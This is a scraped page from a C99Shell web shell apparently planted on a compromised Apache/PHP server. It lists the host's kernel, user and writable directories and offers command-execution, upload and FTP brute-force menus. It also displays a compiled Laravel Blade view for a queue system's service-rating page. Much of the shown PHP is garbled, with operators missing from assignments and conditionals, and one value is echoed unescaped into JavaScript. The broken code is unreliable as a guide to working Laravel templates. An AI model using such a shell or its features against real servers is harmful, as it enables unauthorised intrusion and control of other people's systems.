!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/queuepro/storage/framework/views/   drwxrwxrwx
Free 13.17 GB of 57.97 GB (22.72%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     66a3ad7b6e75957db97fd46282fd6af0f8d7a5b8.php (7.85 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php $__env->startSection('title'); ?> Service Rating <?php $__env->stopSection(); ?>
<?php $__env
->startSection('content'); ?>
<?php $__env
->startComponent('components.breadcrumb'); ?>
<?php $__env
->slot('li_1'); ?> Service <?php $__env->endSlot(); ?>
<?php $__env
->slot('title'); ?>Rating List <?php $__env->endSlot(); ?>
<?php 
echo $__env->renderComponent(); ?>

<div class="row">
    <div class="col-lg-12">
        <div class="card">
            <?php if($errors->any()): ?>
                <div class="alert alert-danger">
                    <?php $__currentLoopData $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                        <span class="each-error"><?php echo e($error); ?> </span><br/>
                    <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                </div>
            <?php endif; ?>
            <?php if(session()->has('message')): ?>
                <div class="alert alert-success">
                    <?php echo e(session()->get('message')); ?>

                </div>
            <?php endif; ?>
            <div class="card-body border border-dashed border-end-0 border-start-0">
                <form method="POST" action="<?php echo e(route('rating.filter')); ?>">
                    <?php echo csrf_field(); ?>
                    <div class="row g-3">
                        <div class="col-xxl-2 col-sm-3" style="max-height:40px;">
                            <div>
                                <?php
                                    $agent_dt 
= (isset($agent)) ? $agent "all";
                                
?>
                                <?php if(Auth::user()->is_agent == 1): ?>
                                    <input type="hidden" name="agent" value="<?php echo e(Auth::user()->id); ?>">
                                    <input type="text" class="form-control" value="<?php echo e(Auth::user()->name); ?>" disabled>
                                <?php else: ?>
                                    <select class="js-example-basic-single form-control" 
                                        name="agent" id="idAgent">
                                        <option value="" disabled>Select Agent</option>
                                        <option value="all" selected>All Agent</option>
                                        <?php if(isset($agents)): ?>
                                            <?php $__currentLoopData $agents$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $agent): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                                <option value="<?php echo e($agent->id); ?>"><?php echo e($agent->name); ?></option>
                                            <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                                        <?php endif; ?>
                                    </select>
                                <?php endif; ?>
                            </div>
                        </div>
                        <!--end col-->
                        <div class="col-xxl-2 col-sm-4">
                            <div>
                                <?php
                                   $date_dt 
= (isset($date_range)) ? $date_range "";
                                
?>
                                <input type="text" class="form-control" data-provider="flatpickr"
                                    data-date-format="d M, Y" data-range-date="true"
                                    id="demo-datepicker" data-default-date="<?php echo e($date_dt); ?>" name="date_range" placeholder="Select date">
                            </div>
                        </div>
                        <!--end col-->
                        <div class="col-xxl-1 col-sm-3">
                            <div>
                                <button type="submit" class="btn btn-primary w-100"> <i
                                        class="ri-equalizer-fill me-1 align-bottom"></i>
                                    Search
                                </button>
                            </div>
                        </div>
                        <!--end col-->
                    </div>
                    <!--end row-->
                </form>
            </div>
            <div class="card-body">
                <div class="">
                    <table id="ratingTable" class="table nowrap dt-responsive align-middle table-hover table-bordered" style="width:100%">
                        <thead>
                            <tr>
                                <?php if(Auth::user()->is_agent !== 1): ?>
                                    <th>Agent ID</th>
                                    <th>Agent Name</th>
                                <?php endif; ?>
                                <th>Token No.</th>
                                <th>Rating</th>
                                <th>DateTime</th>
                            </tr>
                        </thead>
                        <tbody>
                            <?php
                                $i
=1;
                            
?>
                            <?php if(isset($ratings)): ?>
                                <?php $__currentLoopData $ratings$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $rating): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                <tr>
                                    <?php if(Auth::user()->is_agent !== 1): ?>
                                        <td> <?php echo e($rating->agent_Data $rating->agent_Data->agent_id 'N/A'); ?></td>
                                        <td> <?php echo ( $rating->agent_Data ?  $rating->agent_Data->name 'N/A'); ?></td>
                                    <?php endif; ?>
                                    <td><?php echo e($rating->trans_id); ?></td>
                                    <td><?php echo ($rating->rating $rating->rating 0); ?></td>
                                    <td><?php echo e($rating->updated_at->setTimezone('Asia/Dhaka')->format('Y-m-d H:i:s')); ?></td>
                                </tr>
                                <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                            <?php endif; ?>
                            
                        </tbody>
                    </table>
                </div>
            </div>
        </div>
    </div>
    <!--end col-->
</div>
<!--end row-->
<?php $__env->stopSection(); ?>

<?php $__env->startSection('script'); ?>
<script>
$(document).ready(function () {
    $('#ratingTable').DataTable({
        order: [],
        dom: 'Bfrtip', // B = Buttons, f = filter, r = processing, t = table, i = info, p = pagination
        buttons: [
            {
                extend: 'copyHtml5',
                text: 'Copy'
            },
            {
                extend: 'csvHtml5',
                text: 'CSV'
            },
            {
                extend: 'excelHtml5',
                text: 'Excel'
            },
            // {
            //     extend: 'pdfHtml5',
            //     text: 'PDF'
            // },
            {
                extend: 'print',
                text: 'Print'
            }
        ]
    });
    var agent_dt = "<?php echo $agent_dt?>";
    $('#idAgent').val(agent_dt); 
    $('#idAgent').trigger('change.select2');
});

</script>
<?php $__env->stopSection(); ?>


<?php echo $__env->make('layouts.master'\Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH /var/www/html/queuepro/resources/views/rating/index.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.1008 ]--